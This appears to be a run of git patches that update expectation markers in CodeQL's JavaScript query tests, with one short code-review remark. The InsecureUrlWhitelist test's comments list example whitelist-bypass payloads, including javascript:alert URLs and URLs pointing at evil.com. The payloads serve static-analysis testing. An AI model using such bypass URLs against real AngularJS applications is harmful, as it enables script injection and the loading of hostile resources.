+++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js @@ -21,7 +21,7 @@ var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK - A is never used. - var b = onlySideEffects(); + var b = onlySideEffects(); // $ Alert console.log(b); var c = 42 + (onlySideEffects(), 42); // OK - value is thrown away. @@ -42,7 +42,7 @@ onlySideEffects: onlySideEffects } - var e = myObj.onlySideEffects.apply(this, arguments); // $ Alert + var e = myObj.onlySideEffects.apply(this, arguments); // $ MISSING: Alert console.log(e); function onlySideEffects2() { From 6cf1334c6d6df6149aca85d5945983af69377c12 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 08:59:27 +0100 Subject: [PATCH 123/892] Fix comment style in UnboundEventHandlerReceiver --- .../Expressions/UnboundEventHandlerReceiver/tst.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js index e129865af56f..f6039b673435 100644 --- a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js @@ -24,9 +24,9 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
    -
    // $ Alert -
    // $ Alert -
    // $ Alert +
    { /* $ Alert */ } +
    { /* $ Alert */ } +
    { /* $ Alert */ }
    From 2b33ed367167bb4f91d160c8642f269ed06e47f3 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 11:17:03 +0100 Subject: [PATCH 124/892] JS: Remove incorrect alert marker --- .../Electron/NodeIntegration/EnablingNodeIntegration.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index b5a8481305e9..5e8bc71a92ff 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // $ Alert - explicitly disabled + var safe_used = { // explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, From a1c13f02be912a59eeaf5b61120436ecb20dc20c Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 11:19:27 +0100 Subject: [PATCH 125/892] JS: Remove alert marker that's reported on another line We had two 'NOT OK' comments for the same alert. The alert appears on the 'pref' object above. --- .../Electron/NodeIntegration/EnablingNodeIntegration.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e8bc71a92ff..e002845d7995 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -26,7 +26,7 @@ function test() { sandbox: true }; // $ Alert - var options_2 = { // $ Alert - implicitly enabled + var options_2 = { webPreferences: pref, show: true, frame: true, From dc28bb527bbe2852dfd702e0bf65b4684a02436e Mon Sep 17 00:00:00 2001 
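Review bot: Removing the marker from `var options_2 = {` also removes the words `implicitly enabled`, which were the only explanation of why this object is part of the test. The alert is asserted on the closing line of `pref` above, and `options_2` only reaches it through `webPreferences: pref`, so a reader of this line no longer sees the connection. I would keep a plain comment, `var options_2 = { // implicitly enabled via pref; the alert is reported on pref`. The same applies to the previous commit's hunk, where `// explicitly disabled` reads more clearly as `// OK - explicitly disabled`. `test()` starts and ends outside both hunks.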
From: Asger F Date: Wed, 26 Feb 2025 11:21:41 +0100 Subject: [PATCH 126/892] JS: Fix alert location and use RelatedLocation in InsecureUrlWhitelist --- .../AngularJS/InsecureUrlWhitelist/tst.js | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js index 6ede37fed7cc..1ee742c6d6a2 100644 --- a/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/InsecureUrlWhitelist/tst.js @@ -1,11 +1,11 @@ angular.module('myApp', []) .config(function($sceDelegateProvider) { $sceDelegateProvider.resourceUrlWhitelist([ - "**://example.com/*", // $ Alert - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) - "*://example.org/*", // $ Alert - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) - "https://**.example.com/*", // $ Alert - exploit: https://evil.com/?ignore=://example.com/a - "https://example.**", // $ Alert - exploit: https://example.evil.com or http://example.:foo@evil.com - "https://example.*", // $ Alert - exploit: https://example.UnexpectedTLD + "**://example.com/*", // $ RelatedLocation - (exploit: http://evil.com/?ignore=://example.org/a or javascript:alert(1);://example.org/a) + "*://example.org/*", // $ RelatedLocation - (exploit: javascript://example.org/a%0A%0Dalert(1) using a linebreak to end the comment starting with "//"!) + "https://**.example.com/*", // $ RelatedLocation - exploit: https://evil.com/?ignore=://example.com/a + "https://example.**", // $ RelatedLocation - exploit: https://example.evil.com or http://example.:foo@evil.com + "https://example.*", // $ RelatedLocation - exploit: https://example.UnexpectedTLD "https://example.com", "https://example.com/**", 
@@ -19,6 +19,6 @@ angular.module('myApp', []) "https://*.example.com", // not flagged: - /http:\/\/www.example.org/g // $ Alert - (exploit http://wwwaexample.org (dots are not escaped)) - ]); + /http:\/\/www.example.org/g // $ MISSING: RelatedLocation - (exploit http://wwwaexample.org (dots are not escaped)) + ]); // $ Alert }); From 605999454acf161f3056967f5e00d4b9d5d95e17 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 12:52:06 +0100 Subject: [PATCH 127/892] JS: Accept more results in SpuriousArguments --- .../LanguageFeatures/SpuriousArguments/reflection.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js index 41f312bd0791..ac2df0dafdce 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js @@ -4,7 +4,7 @@ function f1(x) {return;} f0.call(); f0.call(this); f0.call(this, 1); // $ Alert -f0.call(this, 1, 2); +f0.call(this, 1, 2); // $ Alert f1.call(); f1.call(this); From 87ed86e4fdb3e8af624a9ad7c27a8be9462550ab Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 17:12:53 +0100 Subject: [PATCH 128/892] JS: Update UnusedOrUndefinedStateProperty Using RelatedLocations to add clarity --- .../Expressions/ImplicitOperandConversion/tst.js | 2 +- .../test/query-tests/Expressions/MissingAwait/tst.js | 2 +- .../Expressions/SuspiciousInvocation/eval.js | 2 +- .../LanguageFeatures/IllegalInvocation/tst.js | 4 ++-- .../React/UnusedOrUndefinedStateProperty/issue7506.js | 4 ++-- .../React/UnusedOrUndefinedStateProperty/undefined.js | 10 +++++----- .../React/UnusedOrUndefinedStateProperty/unused.js | 10 +++++----- 7 files changed, 17 insertions(+), 17 deletions(-) 
diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index fe1e7d6924b0..a72dc333dac5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -74,7 +74,7 @@ function l() { x ** 2; // $ Alert } -1n + 1; // $ MISSED: Alert +1n + 1; // $ MISSING: Alert (function(){ let sum = 0; diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 28e95513d401..61f599a6c33d 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js @@ -59,7 +59,7 @@ function useThingPossiblySync(b) { if (thing == null) {} - return thing + "bar"; // $ MISSED: Alert + return thing + "bar"; // $ MISSING: Alert } function useThingInVoid() { diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js index 2cf1e74a33eb..db14aca9ea65 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js @@ -6,7 +6,7 @@ function foo() { function bar() { var g; - g(); // $ MISSED: Alert + g(); // $ MISSING: Alert eval("g = alert"); } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 1ffb7a489c8e..48af86687794 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js 
@@ -12,7 +12,7 @@ let c = new C(); C(); // $ Alert new (x=>x); // $ Alert c.m(); -new c.m(); // $ MISSED: Alert +new c.m(); // $ MISSING: Alert var o = { f: function() {}, @@ -21,7 +21,7 @@ var o = { o.f(); new o.f(); o.g(); -new o.g(); // $ MISSED: Alert +new o.g(); // $ MISSING: Alert function f(b) { var g; diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js index f5acdc8d99ab..07932d220d65 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/issue7506.js @@ -9,10 +9,10 @@ class C1 extends React.Component { } } -class C2 extends React.Component { +class C2 extends React.Component { // $ Alert state = { - p1: '' + p1: '' // $ RelatedLocation } static getDerivedStateFromProps_unmodeled(props, state) { diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index afc4f61b083c..96ffb02f8b0b 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -1,12 +1,12 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.writtenDirectly = 42; this.setState({ writtenInSetState: 42 }); this.state.writtenInOtherMethod; - this.state.notWritten; // $ Alert - this.state.notWrittenButReadInChain; // $ Alert + this.state.notWritten; // $ RelatedLocation + this.state.notWrittenButReadInChain; // $ RelatedLocation this.state.writtenDirectly; this.state.writtenInSetState; 
@@ -29,10 +29,10 @@ class C2 extends React.Component { } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { this.state.writtenThrougExternalPropertyAccess; - this.state.notWrittenThrougExternalPropertyAccess; // $ Alert + this.state.notWrittenThrougExternalPropertyAccess; // $ RelatedLocation } } diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index d2ff35967673..9c4e5441167a 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -1,9 +1,9 @@ -class C1 extends React.Component { +class C1 extends React.Component { // $ Alert constructor() { this.state.readDirectly = 42; this.state.readInChain = {}; this.state.readInOtherMethod = {}; - this.state.notRead = 42; // $ Alert + this.state.notRead = 42; // $ RelatedLocation this.state.readDirectly; this.state.readInChain.foo; } @@ -18,16 +18,16 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // $ Alert + this.state.readWhenEscaped = 42; // $ MISSING: Alert f(this.state); } } -class C3 extends React.Component { +class C3 extends React.Component { // $ Alert constructor() { this.state.readThrougExternaPropertyAccess = 42; - this.state.notReadThrougExternaPropertyAccess = 42; // $ Alert + this.state.notReadThrougExternaPropertyAccess = 42; // $ RelatedLocation } } From 8ef51c495fd22fab4ff2315944151073830d4888 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:02:24 +0100 Subject: [PATCH 129/892] JS: Fix wrong expectation in UnusedOrUndefinedStateProperty --- .../query-tests/React/UnusedOrUndefinedStateProperty/unused.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js index 9c4e5441167a..60673a23b620 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/unused.js @@ -18,7 +18,7 @@ function f(s){ } class C2 extends React.Component { constructor() { - this.state.readWhenEscaped = 42; // $ MISSING: Alert + this.state.readWhenEscaped = 42; f(this.state); } } From aade1e863d82329042550215a83ed3e53f392e6b Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:02:38 +0100 Subject: [PATCH 130/892] JS: Add a related location in UnusedOrUndefinedStateProperty --- .../React/UnusedOrUndefinedStateProperty/undefined.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js index 96ffb02f8b0b..165ab793ac71 100644 --- a/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js +++ b/javascript/ql/test/query-tests/React/UnusedOrUndefinedStateProperty/undefined.js @@ -61,7 +61,7 @@ new C5({writtenInUnknownInitializerObject: 42}); React.createClass({ // $ Alert render: function() { this.state.writtenInKnownInitializerObject; - this.state.notWrittenInKnownInitializerObject; + this.state.notWrittenInKnownInitializerObject; // $ RelatedLocation return
    ; }, getInitialState: function() { From 0496de6c8f9c561182cb0b46fa3ee3ac19c0183d Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:05:29 +0100 Subject: [PATCH 131/892] JS: Accept alerts in UselessCharacterEscape --- .../UselessCharacterEscape/tst-escapes.js | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index 3df355052a55..f776c9d40e68 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -10,12 +10,12 @@ RegExp("{}\"|<>?"); RegExp(" "); // backslashes -RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); -RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); -RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); +RegExp("\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\\u\v\\x\y\z"); // $ Alert +RegExp("\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z"); // $ Alert +RegExp("\`\1\2\3\4\5\6\7\8\9\0\-\="); // $ Alert RegExp("\~\!\@\#\$\%\^\&\*\(\)\_\+"); // $ Alert RegExp("\[\]\'\\,\.\/"); // $ Alert -RegExp("\{\}\\\"\|\<\>\?"); +RegExp("\{\}\\\"\|\<\>\?"); // $ Alert RegExp("\ "); /\a\b\c\d\e\f\g\h\i\j\k\l\m\n\o\p\q\r\s\t\u\v\\x\y\z"/; /\A\B\C\D\E\F\G\H\I\J\K\L\M\N\O\P\Q\R\S\T\U\V\X\Y\Z/; 
@@ -57,17 +57,17 @@ RegExp("[\.]"); // $ Alert RegExp("a[b\.c]d"); // $ Alert RegExp("\b"); RegExp(`\b`); -RegExp(`\k\\k\d\\d`) -RegExp(`\k\\k${foo}\d\\d`) +RegExp(`\k\\k\d\\d`) // $ Alert +RegExp(`\k\\k${foo}\d\\d`) // $ Alert // effective escapes -RegExp("\]") +RegExp("\]") // $ Alert RegExp("\\]") RegExp("\\\]"); // effectively escaped after all RegExp("x\\\]"); // effectively escaped after all RegExp("\\\\]") -RegExp("\\\\\]") +RegExp("\\\\\]") // $ Alert RegExp("\\\\\\]") RegExp("\\\\\\\]") // effectively escaped after all RegExp("\\\\\\\\]") -RegExp("\\\\\\\\\]") +RegExp("\\\\\\\\\]") // $ Alert From bb67a0e9b09175c4a56fb1bd0ec40ccfdc46685e Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:05:53 +0100 Subject: [PATCH 132/892] JS: Remove outdated comment --- .../UselessCharacterEscape.expected | 118 +++++++++--------- .../UselessCharacterEscape/tst-escapes.js | 2 - 2 files changed, 59 insertions(+), 61 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected index 6cd6e27b0edc..b3c764e85cbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected 
@@ -1,59 +1,59 @@ -| tst-escapes.js:19:8:19:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... 
\\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... 
\\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | -| tst-escapes.js:24:1:24:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | -| tst-escapes.js:26:1:26:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:29:8:29:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:31:8:31:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:33:8:33:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:35:8:35:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. 
| -| tst-escapes.js:37:8:37:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:42:1:42:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | -| tst-escapes.js:48:8:48:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:50:8:50:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:66:8:66:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:67:8:67:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:71:8:71:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:17:8:17:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... 
x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | +| 